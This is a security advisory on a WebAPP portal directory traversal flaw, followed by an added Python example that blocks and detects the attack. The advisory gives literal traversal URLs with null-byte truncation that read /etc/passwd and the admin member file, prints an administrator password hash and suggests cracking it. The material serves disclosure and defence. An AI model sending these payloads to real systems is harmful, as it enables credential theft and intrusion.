WebAPP directory traversal and ability to retrieve the DES encrypted password hash
Aug 24 2004 03:42PM
Jérôme ATHIAS (jerome athias caramail com)
WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are:
-Easy to Install on standard Unix servers!
(Windows user-supported only!)
-User Profiles
-Message forums
-Private messaging between members
-Blog-style News Articles
-Links and Downloads
-Customizable themes
-Multiple language support
-Flat-file System-NO SQL DATABASE!
-Membership controls
-Open source
Several user mods are also available, ranging from chat
to e-commerce applications.
Several vulnerabilities in these mods have already been
discovered.
The WebAPP system itself has a serious reverse directory
traversal vulnerability.
Example:
1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
(this is their main support site)
2) Click on Articles on the main menu at the left side of
the screen
3) Click on any of the icons representing the misc topics
available (I chose the "bugs" section)
4) You'll wind up with the URL
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs"
in the address bar of your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../etc/passwd%00"
5) View the HTML source for the page.
A more interesting file to look at would be:
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"
View the HTML source code and scroll down until you come to
the line with:
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"></a></td>
"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted, so you can
run a password cracking program to crack it.
Every user would have a corresponding .dat file within the
db/members directory.
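The traversal above depends on two things a defender can check for directly: a filename built from a request parameter, and a null byte that truncates it. The following is an added example, not code from the advisory or from WebAPP, written in Python rather than Perl for illustration. It shows a strict allowlist for a category parameter that is later used as a path component, a scanner over constructed Apache-style access-log lines that flags the request shapes described above (null bytes, parent-directory traversal, double-encoded variants, and references to member data files), and a format check for the 13-character traditional DES crypt(3) hash the post describes. The base directory and the log lines are constructed for the example.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed base directory for topic files (an assumption, not WebAPP's real layout).
TOPIC_BASE = "/srv/webapp/db/topics"

# A category name used to build a file path should look like an identifier, not a path.
CATEGORY_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

# ".." as a whole path component, with either slash style, at start, middle or end.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

# Traditional DES crypt(3): 13 characters from the ./0-9A-Za-z alphabet (2-char salt + 11).
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")

# Request line inside an Apache combined-format access log entry.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<uri>\S+) HTTP/[\d.]+"')


def safe_topic_path(base: str, viewcat: str) -> Optional[str]:
    """Return the on-disk path for a topic category, or None if the value is unsafe.

    Rejects embedded null bytes (which truncate a filename at the C-level open()),
    anything outside a strict allowlist, and, as a second line of defence, any
    result whose resolved path is not inside `base`.
    """
    if "\x00" in viewcat:
        return None
    if not CATEGORY_RE.match(viewcat):
        return None
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, viewcat + ".dat"))
    # commonpath, not startswith: "/srv/webapp/db/topics2" must not pass as a prefix match.
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


def suspicious_request(uri: str) -> List[str]:
    """Return the reasons a request URI looks like a traversal attempt (empty if none)."""
    reasons: List[str] = []
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            # parse_qs already %-decoded once; decode again to catch double encoding (%2500).
            decoded = unquote(raw)
            if "\x00" in decoded:
                reasons.append(f"{name}: null byte")
            if TRAVERSAL_RE.search(decoded):
                reasons.append(f"{name}: parent-directory traversal")
            if re.search(r"(^|[\\/])db[\\/]members[\\/]", decoded):
                reasons.append(f"{name}: references member data files")
    return reasons


def scan_access_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run suspicious_request over each log line; return (uri, reasons) for flagged entries."""
    hits: List[Tuple[str, List[str]]] = []
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        reasons = suspicious_request(match.group("uri"))
        if reasons:
            hits.append((match.group("uri"), reasons))
    return hits


def is_des_crypt_hash(value: str) -> bool:
    """True if value has the shape of a traditional DES crypt(3) hash, i.e. a legacy, weak format."""
    return DES_CRYPT_RE.match(value) is not None


# Constructed sample log lines: a normal request, the /etc/passwd traversal from the
# advisory, and a double-encoded variant aimed at a member data file.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Aug/2004:15:42:01 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=bugs HTTP/1.1" 200 5120',
    '203.0.113.5 - - [24/Aug/2004:15:42:09 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=../../../../../../etc/passwd%00 HTTP/1.1" 200 2310',
    '203.0.113.5 - - [24/Aug/2004:15:42:30 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=..%2F..%2Fdb%2Fmembers%2Fadmin.dat%2500 HTTP/1.1" 200 1980',
]

if __name__ == "__main__":
    for uri, reasons in scan_access_log(SAMPLE_LOG):
        print(uri, "->", "; ".join(reasons))
    print("bugs ->", safe_topic_path(TOPIC_BASE, "bugs"))
    print("traversal ->", safe_topic_path(TOPIC_BASE, "../../db/members/admin.dat\x00"))
    print("DES crypt hash shape:", is_des_crypt_hash("adUCOOzV2ljgg"))
```

The allowlist does the real work: once the parameter can only be an identifier, neither `..` nor `%00` can reach the filesystem, and the `commonpath` check only matters if a later change relaxes the pattern. The log scanner decodes a second time on purpose, because a single `%`-decode is what the web server and `parse_qs` already did, and `%2500` only becomes a null byte after the next one.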
PhTeam Release
Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball
Copyright 2010, SecurityFocus